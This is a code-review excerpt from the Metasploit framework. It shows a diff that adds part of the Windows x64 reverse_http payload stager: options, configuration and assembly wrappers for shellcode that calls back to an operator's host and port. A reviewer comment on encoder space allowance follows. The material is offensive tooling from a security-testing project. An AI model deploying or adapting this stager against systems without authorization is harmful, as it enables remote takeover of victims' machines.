lib/msf/core/payload/windows/x64/reverse_http.rb

```diff
@@ -0,0 +1,468 @@
+        OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10]),
+        OptString.new('PayloadProxyHost', [false, 'An optional proxy server IP address or hostname']),
+        OptPort.new('PayloadProxyPort', [false, 'An optional proxy server port']),
+        OptString.new('PayloadProxyUser', [false, 'An optional proxy server username']),
+        OptString.new('PayloadProxyPass', [false, 'An optional proxy server password']),
+        OptEnum.new('PayloadProxyType', [false, 'The type of HTTP proxy (HTTP or SOCKS)', 'HTTP', ['HTTP', 'SOCKS']])
+      ], self.class)
+  end
+
+  def transport_config(opts={})
+    transport_config_reverse_http(opts)
+  end
+
+  #
+  # Generate the first stage
+  #
+  def generate(opts={})
+    conf = {
+      ssl:         opts[:ssl] || false,
+      host:        datastore['LHOST'],
+      port:        datastore['LPORT'],
+      url:         generate_small_uri,
+      retry_count: datastore['StagerRetryCount']
+    }
+
+    # add extended options if we do have enough space
+    unless self.available_space.nil? || required_space > self.available_space
+      conf[:url]        = generate_uri
+      conf[:exitfunk]   = datastore['EXITFUNC']
+      conf[:proxy_host] = datastore['PayloadProxyHost']
+      conf[:proxy_port] = datastore['PayloadProxyPort']
+      conf[:proxy_user] = datastore['PayloadProxyUser']
+      conf[:proxy_pass] = datastore['PayloadProxyPass']
+      conf[:proxy_type] = datastore['PayloadProxyType']
+    end
+
+    generate_reverse_http(conf)
+  end
+
+  #
+  # Generate and compile the stager
+  #
+  def generate_reverse_http(opts={})
+    combined_asm = %Q^
+      cld                    ; Clear the direction flag.
+      and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned 
+      call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+      #{asm_block_api}
+      start:
+        pop rbp
+      #{asm_reverse_http(opts)}
+    ^
+    Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string
+  end
+
+  #
+  # Generate the URI for the initial stager
+  #
+  def generate_uri
+
+    uri_req_len = datastore['StagerURILength'].to_i
+
+    # Choose a random URI length between 30 and 255 bytes
+    if uri_req_len == 0
+      uri_req_len = 30 + rand(256-30)
+    end
+
+    if uri_req_len < 5
+      raise ArgumentError, "Minimum StagerURILength is 5"
+    end
+
+    generate_uri_uuid_mode(:init_native, uri_req_len)
+  end
+
+  #
+  # Generate the URI for the initial stager
+  #
+  def generate_small_uri
+    generate_uri_uuid_mode(:init_native, 5)
+  end
+
+  #
+  # Determine the maximum amount of space required for the features requested
+  #
+  def required_space
+    # Start with our cached default generated size
+    space = cached_size
+
+    # Add 100 bytes for the encoder to have some room
+    space += 100
```

Comment:
It seems weird that the payload has to account for the encoder's space. Shouldn't this be handled elsewhere?